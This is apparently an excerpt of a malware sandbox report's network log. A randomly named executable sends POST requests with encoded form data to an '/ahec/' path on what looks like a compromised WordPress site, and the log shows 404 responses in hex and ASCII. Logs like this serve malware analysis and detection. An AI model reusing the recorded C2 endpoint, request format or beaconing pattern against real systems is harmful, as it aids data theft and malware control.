                                                                          Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                          Dec 2, 2023 18:50:40.391390085 CET1340INData Raw: 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f
                                                                          Data Ascii: @context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://altralogos.com/#website","url":"https://altralogos.com/","name":"Altralogos","description":"Altralogos","potentialAction":[{"@type":"SearchAction","target":{"@type":"En
                                                                          Dec 2, 2023 18:50:40.391403913 CET1340INData Raw: 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a
                                                                          Data Ascii: .125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><link rel='stylesheet' id='elementor-icons-css' href='http://altralogos.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
                                                                          Dec 2, 2023 18:50:40.391419888 CET1340INData Raw: 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 62 61 73 65 2d 64 65 70 72 65 63 61 74 65 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c
                                                                          Data Ascii: media='all' /><link rel='stylesheet' id='wd-base-deprecated-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/base-deprecated.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-elementor-base-
                                                                          Dec 2, 2023 18:50:40.391433001 CET1340INData Raw: 27 20 69 64 3d 27 77 64 2d 70 61 67 65 2d 74 69 74 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73
                                                                          Data Ascii: ' id='wd-page-title-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-wd-search-form-css' href='http://altralogos.com/wp-content/the
                                                                          Dec 2, 2023 18:50:40.391446114 CET1340INData Raw: 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 6f 70 74 2d 73 63 72 6f 6c 6c 74 6f 74 6f 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 35 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63
                                                                          Data Ascii: -content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Inter%3A400%2C600%2C300%7CPlayfair+Display%3A40
                                                                          Dec 2, 2023 18:50:40.391460896 CET1340INData Raw: 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 3f
                                                                          Data Ascii: I" type="application/rsd+xml" title="RSD" href="https://altralogos.com/xmlrpc.php?rsd" /><meta name="generator" content="WordPress 6.4.1" /><meta name="theme-color" content="rgb(1,34,31)"><meta name="viewport" content="width=device-widt
                                                                          Dec 2, 2023 18:50:40.391474962 CET1340INData Raw: 70 3a 20 2d 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2b 20 30 70 78 29 3b 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31
                                                                          Data Ascii: p: -0px;margin-bottom: -0px;height: calc(100% + 0px);}@media (min-width: 1025px) {.whb-top-bar-inner {height: 80px;max-height: 80px;}.whb-sticked .whb-top-bar-inner {height: 40px;max-height: 40px;}.whb-he
                                                                          Dec 2, 2023 18:50:40.391597033 CET1340INData Raw: 6c 61 79 22 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 63 6f 6c 6f 72 3a 23
                                                                          Data Ascii: lay", Arial, Helvetica, sans-serif;--wd-title-font-weight:600;--wd-title-color:#242424;}:root{--wd-entities-title-font:"Playfair Display", Arial, Helvetica, sans-serif;--wd-entities-title-font-weight:700;--wd-entities-title-color:#33333
                                                                          Dec 2, 2023 18:50:40.391609907 CET1340INData Raw: 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 73 75 63 63 65 73 73 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 7d 0a 3a 72 6f 6f 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 62 67 3a 72 67 62 28 32 32 35 2c 31 31 33 2c 36 35 29 3b 0a 7d 0a
                                                                          Data Ascii: t{--notices-success-color:#fff;}:root{--notices-warning-bg:rgb(225,113,65);}:root{--notices-warning-color:#fff;}:root{--wd-form-brd-radius: 35px;--wd-form-brd-width: 2px;--btn-default-color: #ff
                                                                          Dec 2, 2023 18:50:40.578263044 CET1340INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                          Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.2.549761185.74.252.11801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:41.927356005 CET814OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.altralogos.com
                                                                          Origin: http://www.altralogos.com
                                                                          Referer: http://www.altralogos.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 36 6e 41 59 31 70 77 4a 75 72 46 33 6c 34 6c 74 73 47 30 6a 65 79 2f 32 5a 41 4e 64 6e 75 70 76 5a 5a 38 67 4e 43 57 31 57 44 67 6d 6d 54 76 39 4e 47 6c 6a 72 4a 33 57 47 49 6e 73 34 51 48 77 51 64 74 2f 53 45 71 6e 38 30 79 31 4c 57 53 66 39 42 79 50 54 36 54 70 41 64 57 74 4a 6e 39 59 61 71 58 4c 6b 37 70 62 6a 4c 44 66 6c 78 55 39 70 46 47 2f 62 4a 45 2f 43 46 33 34 55 56 46 4d 68 76 64 6d 30 71 58 32 76 6d 34 6c 58 50 70 4d 37 54 37 39 6a 72 34 62 48 61 76 4f 53 68 6a 37 2f 6b 37 34 73 43 46 71 6b 4f 47 5a 6a 61 71 4d 51 67 44 45 67 5a 44 48 52 51 41 67 5a 73 69 46 4d 34 51 5a 42 72 41 3d
                                                                          Data Ascii: KHcH=6nAY1pwJurF3l4ltsG0jey/2ZANdnupvZZ8gNCW1WDgmmTv9NGljrJ3WGIns4QHwQdt/SEqn80y1LWSf9ByPT6TpAdWtJn9YaqXLk7pbjLDflxU9pFG/bJE/CF34UVFMhvdm0qX2vm4lXPpM7T79jr4bHavOShj7/k74sCFqkOGZjaqMQgDEgZDHRQAgZsiFM4QZBrA=
                                                                          Dec 2, 2023 18:50:43.047451019 CET1340INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:41 GMT
                                                                          Server: Apache
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22
                                                                          Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                          Dec 2, 2023 18:50:43.047496080 CET1340INData Raw: 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f
                                                                          Data Ascii: @context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://altralogos.com/#website","url":"https://altralogos.com/","name":"Altralogos","description":"Altralogos","potentialAction":[{"@type":"SearchAction","target":{"@type":"En
                                                                          Dec 2, 2023 18:50:43.047509909 CET1340INData Raw: 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a
                                                                          Data Ascii: .125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><link rel='stylesheet' id='elementor-icons-css' href='http://altralogos.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
                                                                          Dec 2, 2023 18:50:43.047523022 CET1340INData Raw: 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 62 61 73 65 2d 64 65 70 72 65 63 61 74 65 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c
                                                                          Data Ascii: media='all' /><link rel='stylesheet' id='wd-base-deprecated-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/base-deprecated.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-elementor-base-
                                                                          Dec 2, 2023 18:50:43.047535896 CET1340INData Raw: 27 20 69 64 3d 27 77 64 2d 70 61 67 65 2d 74 69 74 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73
                                                                          Data Ascii: ' id='wd-page-title-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-wd-search-form-css' href='http://altralogos.com/wp-content/the
                                                                          Dec 2, 2023 18:50:43.047549963 CET1340INData Raw: 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 6f 70 74 2d 73 63 72 6f 6c 6c 74 6f 74 6f 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 35 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63
                                                                          Data Ascii: -content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Inter%3A400%2C600%2C300%7CPlayfair+Display%3A40
                                                                          Dec 2, 2023 18:50:43.047563076 CET1340INData Raw: 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 3f
                                                                          Data Ascii: I" type="application/rsd+xml" title="RSD" href="https://altralogos.com/xmlrpc.php?rsd" /><meta name="generator" content="WordPress 6.4.1" /><meta name="theme-color" content="rgb(1,34,31)"><meta name="viewport" content="width=device-widt
                                                                          Dec 2, 2023 18:50:43.047616005 CET1340INData Raw: 70 3a 20 2d 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2b 20 30 70 78 29 3b 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31
                                                                          Data Ascii: p: -0px;margin-bottom: -0px;height: calc(100% + 0px);}@media (min-width: 1025px) {.whb-top-bar-inner {height: 80px;max-height: 80px;}.whb-sticked .whb-top-bar-inner {height: 40px;max-height: 40px;}.whb-he
                                                                          Dec 2, 2023 18:50:43.047630072 CET1340INData Raw: 6c 61 79 22 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 63 6f 6c 6f 72 3a 23
                                                                          Data Ascii: lay", Arial, Helvetica, sans-serif;--wd-title-font-weight:600;--wd-title-color:#242424;}:root{--wd-entities-title-font:"Playfair Display", Arial, Helvetica, sans-serif;--wd-entities-title-font-weight:700;--wd-entities-title-color:#33333
                                                                          Dec 2, 2023 18:50:43.047645092 CET1340INData Raw: 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 73 75 63 63 65 73 73 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 7d 0a 3a 72 6f 6f 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 62 67 3a 72 67 62 28 32 32 35 2c 31 31 33 2c 36 35 29 3b 0a 7d 0a
                                                                          Data Ascii: t{--notices-success-color:#fff;}:root{--notices-warning-bg:rgb(225,113,65);}:root{--notices-warning-color:#fff;}:root{--wd-form-brd-radius: 35px;--wd-form-brd-width: 2px;--btn-default-color: #ff
                                                                          Dec 2, 2023 18:50:43.232503891 CET1340INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                          Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          43192.168.2.549762185.74.252.11801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:44.629376888 CET1827OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.altralogos.com
                                                                          Origin: http://www.altralogos.com
                                                                          Referer: http://www.altralogos.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 36 6e 41 59 31 70 77 4a 75 72 46 33 6c 34 6c 74 73 47 30 6a 65 79 2f 32 5a 41 4e 64 6e 75 70 76 5a 5a 38 67 4e 43 57 31 57 44 6f 6d 6d 6c 7a 39 4d 6e 6c 6a 71 4a 33 57 4d 6f 6e 58 34 51 48 35 51 64 31 37 53 45 6d 64 38 79 32 31 45 55 61 66 36 7a 57 50 49 71 54 70 4f 4e 57 67 57 58 39 4e 61 75 4c 50 6b 37 5a 62 6a 4c 44 66 6c 7a 63 39 35 67 36 2f 5a 4a 45 38 4c 6c 33 30 46 46 46 6f 68 72 49 62 30 71 44 63 73 58 59 6c 4f 73 52 4d 39 6d 58 39 76 72 34 5a 47 61 75 49 53 67 66 4e 2f 6b 6e 30 73 42 5a 41 6b 4a 79 5a 69 74 4c 42 58 55 33 2f 36 37 33 65 58 42 35 79 50 4d 33 48 56 4e 4d 2b 55 66 6a 76 35 54 55 2b 6e 56 56 65 56 46 61 34 75 43 51 34 2f 33 77 66 67 5a 54 67 59 53 72 2b 52 33 64 35 45 4b 55 30 37 66 6a 58 59 57 77 45 4c 62 31 6e 58 34 2b 57 61 76 38 37 4d 70 49 31 44 32 47 39 34 44 46 56 35 71 7a 68 48 2f 31 34 76 46 55 75 31 6b 30 4f 67 71 52 35 47 53 71 4e 74 66 69 72 74 69 43 71 55 53 43 4c 77 33 48 53 50 42 50 71 56 52 2f 64 33 49 79 67 31 63 56 68 52 75 73 72 6b 52 43 36 43 54 47 7a 68 72 73 79 45 4b 69 4c 59 50 39 4d 51 54 4c 63 33 49 69 61 6d 73 39 30 69 46 72 72 53 53 35 58 36 2f 55 74 50 36 55 74 76 53 4c 6f 63 46 65 61 68 54 33 7a 6a 52 63 45 74 39 36 6e 42 4a 42 4c 30 4a 4e 47 34 72 36 4a 78 7a 45 43 49 6c 51 55 70 69 50 6d 4a 42 63 33 45 70 37 37 51 46 6f 58 57 4a 4e 57 67 46 49 61 36 33 78 39 53 4a 62 78 5a 52 57 6b 78 62 50 32 38 4c 37 4f 5a 39 39 47 74 31 41 50 4d 34 46 42 67 70 35 73 6e 79 4e 4c 72 62 78 6d 4b 6f 2b 6d 52 70 59 6e 55 4c 74 4a 6b 32 4a 36 47 48 56 45 33 4f 4f 65 62 34 43 5a 79 58 75 43 5a 47 37 67 39 78 75 73 71 37 30 43 72 32 68 42 37 30 71 45 35 46 4f 75 48 35 78 35 4f 33 51 63 57 4b 77 44 43 56 6c 34 4e 5a 41 35 51 6c 71 31 64 33 46 33 2b 51 6f 2f 41 2f 5a 68 4d 76 50 44 66 6a 70 59 78 64 35 4e 47 4a 35 53 52 6b 35 41 70 62 31 4e 76 65 65 39 70 32 53 4b 69 55 46 32 35 64 36 78 67 68 75 6a 76 49 4d 71 4b 53 2b 67 61 41 72 59 2b 73 33 78 37 4f 4b 55 77 66 6c 54 57 6e 62 47 4c 33 61 57 64 7a 65 38 72 4b 4d 43 35 77 37 47 31 2b 65 63 47 78 79 31 4d 69 4a 55 4c 41 38 5a 65 32 44 6c 78 62 67 58 42 41 49 4a 51 51 45 77 41 45 57 47 66 70 32 4a 6f 46 68 4e 62 66 79 4f 55 77 34 32 56 48 6d 6d 74 70 43 42 2f 78 32 68 62 68 58 46 35 34 51 50 67 6c 4e 6f 70 54 44 66 6a 76 70 76 41 67 48 58 35 4a 31 48 6e 31 4a 50 74 4e 32 58 55 75 73 38 43 79 41 50 31 6c 52 61 6b 70 32 79 45 71 4a 5a 4a 7a 33 74 45 46 44 41 6c 5a 61 58 49 68 7a 7a 56 32 72 72 77 6a 78 72 53 67 67 55 50 7a 46 42 69 48 53 6b 6b 55 33 52 68 39 39 4f 72 68 66 2b 37 44 57 6f 2f 55 67 53 41 2f 75 57 6b 78 53 4b 41 36 32 4e 6c 2f 41 73 38 52 4d 56 52 7a 2b 41 65 78 41 6e 74 75 4f 75 37 6d 76 63 72 45 7a 69 35 4b 6d 37 67 6f 59 41 31 6f 2f 42 4b 38 53 57 31 49 63 66 74 44 30 78 2f 4e 4e 34 77 2b 48 77 56 73 72 73 58 6e 6c 4b 55 34 6c 45 6c 56 48 65 6b 32 73 4f 44 59 39 69 4a 52 7a 75 39 6c 79 75 4e 6b 47 70 47 76 30 33 4b 59 54 6b 55 52 32 4a 30 59 73 37 66 54 2b 63 31 63 78 69 58 65 55 75 47 51 48 2b 55 70 68 33 73 63 64 48 72 76 49 68 62 4f 35 4f 37 4f 45 6f 39 69 7a 4f 47 33 71 39 61 6f 30 58 51 2b 66 42 33 62 54 4e 2b 58 77 52 67 41 78 4d 70 58 44 49 53 52 43 47 6a 69 70 51 31 75 42 65 76 6c 78 6f 68 47 70 35 47 6c 39 66 62 50 78 66 52 58 6b 69 73 6b 66 56 57 30 71 44 46 4d 64 4d 61 6a 34 4d 44 66 64 2f 73 37 4e 44 53 67 57 62 72 49 38 4d 76 59 72 76 46 73 50 30 57 58 59 4f 6a 67 4f 6f 67 6c 42 33 46 34 46 49 71 4d 37 2b 56 67 68 4f 2f 57 33 2b 7a 6b 42 77 65 6f 37 36 54 4c 54 50 5a 56 67 70 57 34 5a 67 75 78 47 69 56 48 39 76 71 42 72 51 64 76 48 5a 59 4a 49 63 51 6d 51 76 2b 55 64 77 77 61 65 75 47 68 4d 75 32 50 59 7a 31 72 2f 42 51 6b 65 53 74 51 36 51 63 66 59 34 52 68 2b 2f
